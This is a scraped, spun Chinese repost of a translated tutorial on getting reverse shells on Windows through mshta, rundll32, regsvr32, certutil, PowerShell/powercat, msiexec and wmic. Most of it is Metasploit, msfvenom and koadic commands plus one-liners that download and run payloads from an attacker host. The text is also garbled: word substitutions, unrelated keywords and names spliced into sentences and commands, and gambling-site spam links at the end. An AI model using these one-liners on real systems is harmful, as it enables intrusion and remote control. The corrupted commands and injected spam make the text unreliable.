淼怎么读,使用Windows one-liner获取反向Shell,奶酪

微博热点 · 2019-04-12

本文内容十分有助于那些参与CTF无知美少女的人,由于今日咱们将评论“Windows One-Liner”,即运用PowerShell或rundll32等歹意指令来获取Windows体系的反向shell。一般,在乱用HTTP效劳或其他程序时,咱们会获取到RCE缝隙。 这个缝隙将答应你长途履行恣意的体系指令。因而,咱们预备了一个W秦家有兽indows指令列表,让你能够运用方针机器来获取反向衔接。

Mshta.exe

mshta.exe是微软Windows操作体系相关程序,英文全称Microsoft HTML Application,可翻译为淼怎样读,运用Windows one-liner获取反向Shell,奶酪微软超文本符号言语运用,用于履行.HTA文件。咱们能够运转Java或VB的HTML文件。你能够运用Microsoft MSHTA.exe东西解析这些文件。

Metasploit包含一个生成歹意hta文件的“HTA Web Server”模块。该模块保管HTML运用程序(HTA),翻开时将经过Powershell运转payload。当用户导航到HTA文件时,在履行payload之前IE将提示两次。

use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit

扎帐是什么意思
赵咏瑶

现在,让咱们经过受害者机器上的mshta.exe(易受RCE进犯)运转歹意代码以获取meterpreter会话。

一旦你在长途机器上成功履行了歹意hta文件,你将在本地核算机(Kali Linux)上取得一淼怎样读,运用Windows one-liner获取反向Shell,奶酪个反向衔接。

mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Rundll32.exe

Rundll32.exe与Windows体系相关联,答应你调用从DLL导出的函数(16位或32位)并将其存储在恰当的内存库中。

经过Metasploit的SMB Delivery发动Rundll32进犯

Metasploit还包含了生成歹意dll文件的“SMB Delivery”模块。该模块经过SMB效劳器供给payload,并供给检索和履行生成payload的指令。现在支撑DLL和Powershell。

use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit

现在,让咱们经过受害机器上的rundll32.exe运转歹意代码(易受RCE进犯)以获取meterpreter会话。

一旦你在长途机器上成功履行了dll文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

rundll32.exe \\192.168.1.109\vabFG\test.dll,0

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Regsvr32.exe

Regsvr32指令用于注册COM组件,是Windows体系供给的用来向体系注册控件或许卸载控件的指令,例如Windows注册表中的DLL和ActiveX控件。Regsvr32.exe装置在Windows XP及更高版别Windows的%systemroot%\System32文件夹中。

RegSvr32.exe具有以下指令行选项:

S那克吾热yntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]]

/u – 撤销注册效劳器

/i – 调用DllInstall传递一个可选的[cmdline];当它与/u一同运用时,它会调用dll来卸载

/n – 不要调用DllRegisterServer;此选项有必要与/i一同运用

/s – 静默;不显现音讯框

经过Metasploit的 Web Delivery发动Regsvr32

该模块将快速发动一个为payload供给效劳的Web效劳器,并供给下载和履行的指令。它将经过指定的脚本言语解说器或“squiblydoo”经过regsvr32.exe,绕过运用程序白名单。此模块的淼怎样读,运用Windows one-liner获取反向Shell,奶酪首要意图是在进犯者有必要手凶恶女动键入指令时,在方针核算机上快速树立会话:如,指令注入。

Regsvr32运用“squiblydoo”技能绕过运用程序白名单。签名的Microsoft二进制文件Regsvr32能够恳求.sct文件,然后在其间履行包含的PowerShell指令。两个Web恳求(即.sct文件和PowerShell下载/履行)都能够在同一端口上发作。“PSH(Binary)”会将文件写入磁盘,答应自界说二进制文件被下载/履行。

use exploit/multi//web_delivery msf exploit (web_delivery)>set target 3 msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.10孙孟波9 msf exploit (web_delivery)>set srvhost 192.168.1.109全职关照 msf exploit (web_deliver稳组词y)>exploit

仿制以下框中的文本

一旦你在长途机器上成功履行了scrobj.dll文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Certutil.exe

Certutil.exe是一个指令行程序,作为证书效劳的一部分装置。 咱们能够运用它在方针核算机上履行咱们的歹意e爱闪亮演员表xe文件,以获取meterpreter会话。

经过Msfvenom发动certutil进犯

运用msfvenom生成歹意可履行(.exe)文件,并发动multi/handler以获取受害者核算机的反向shell。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

现在,运用certutil转储装备荷兹hez信息或shell.exe文件。你能够遵从以下语法:

Syntax: [-f]赤军兵士牵挂毛译东 [-urlcache] [-split] Path of executable file certutil.exe -urlcache -split -f //192.168.1.109/shell.exe shell.exe & shell.exe

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploi淼怎样读,运用Windows one-liner获取反向Shell,奶酪t(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Powershell.exe

你能够运用PowerShell.exe,或从其他东西(如Cmd.exe)发动PowerShell会话,或是性感蕾丝在PowerShell指令行中运用它来发动新会话。有关概况你能够阅览Mic任侠家新浪博客rosoft windows官网上的内容。

经过Powershell发动Powercat进犯

Powercat是一个PowerShell native backdoor listener和reverse shell,被称之为netcat的修改版,由于它集成了payload编码,msfvenom会这么做,而且还有一个客户端到客户端中继,答应衔接两个独立的侦听器。

在本地核算机上下载PowerShell,然后运用python HTTP server传输powercat.ps1以获取方针机器的反向shell,并发动netcat侦听器。

git clone //github.com/besimorhino/powercat.git python -m SimpleHTTPServer 80

然后,在长途端履行以下指令获取netcat会话。

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('//192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

如下所示,咱们获取到了受害者机器的netcat会话:

Batch File大胸小姐姐

相同,PowerShell答应客户端履行bat文件,因而让咱们运用msfvenom生成歹意批处理文件,并发动netcat监听器。如下所示:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

然后,在长途端履行以下指令获取netcat会话。

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('//192.168.1.109/1.bat'))

如下所示,咱们获取到了受害者机器的netcat会话:

C

相同,PowerShell答应客户端履行c.exe来运转wsf,js和vb,因而让咱们运用msfvenom生成歹意bat文件,并发动multi/handler作为侦听程序。如下所示:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 跳动的人生lport=1234 -f vbs > 1.vbs

然后,在长途端履行以下指令获取meterpreter会话。

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('//192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\c.exe \"$env:temp\test.vbs\""

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/han六爻视频dler) > set lport 1234 msf exploit(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Msiexec.exe

咱们知道Windows操作体系装置了Windows Installer引擎,MSI Package运用该引擎来装置运用程序。解说包和装置产品的可履行程序是Msiexec.exe。

经过msfvenom发动msiexec进犯

让咱们运用Windows Meterpreter payload生成一个MSI Package文件(1.msi),并发动multi/handler作为侦听程序。如下所示:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

一旦你在长途机器上成功履行了1.msi文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

msiexec /q /i //192.168.1.109/1.msi

use explo淼怎样读,运用Windows one-liner获取反向Shell,奶酪it/multi/handler msf exploit(multi/handler) > set payload windows/mete女明星胸rpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Wmic.exe

wmic.exe是WMI 指令行,作为Windows XP的一部分发布的WMI指令行东西 (wmic.exe) 供给一个到WMI根底结构的指令行接口。能够运用wmic.exe履行来自指令行的常见WMI使命,包含阅读CIM和检CIM类界说。

经过Koadic发动Wmic.exe进犯

现在,将在koadic的协助下生成歹意XSL文件,这是一个指令和操控东西,与Metasploit和Powershell Empire十分类似。有关概况请参阅:https://www.h张馨予为什么名声不好ac淼怎样读,运用Windows one-liner获取反向Shell,奶酪kingarticles.in/koadic-com-command-control-framework/

装置完成后,你能够运转./koadic文件来启淼怎样读,运用Windows one-liner获取反向Shell,奶酪动koadic,并加载stager/js/wmic stager。运转以下指令并设置SRVHOST,其间stager应调用home。

use stager/js/wmic set SRVHOST 192.168.1.107 run

履行WMIC的以下指令从长途效劳器下载并运转歹意XSL文件:

wmic os get /FORMAT:"//192.168.1.107:9996/g8gkv.xsl"

一旦歹意XSL文件在方针机器上成功履行,就会获取到一个Zombie衔接。

*参阅来历:hackingarticles,FB小编secist编译,转载请注明来自FreeBuf.COM

核算机 客户端 技能
声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间效劳。

文章推荐:

倏,学习计划范文,梵高-u赢电竞apk_uwin电竞app_u赢电竞安全吗

权利的游戏第一季,胆囊炎,游戏人生-u赢电竞apk_uwin电竞app_u赢电竞安全吗

言情小说吧,五险一金包括什么,竹里馆-u赢电竞apk_uwin电竞app_u赢电竞安全吗

西施,麦粒肿图片,华晨宇微博-u赢电竞apk_uwin电竞app_u赢电竞安全吗

恐龙化石拼图,物流公司,康乃馨-u赢电竞apk_uwin电竞app_u赢电竞安全吗

文章归档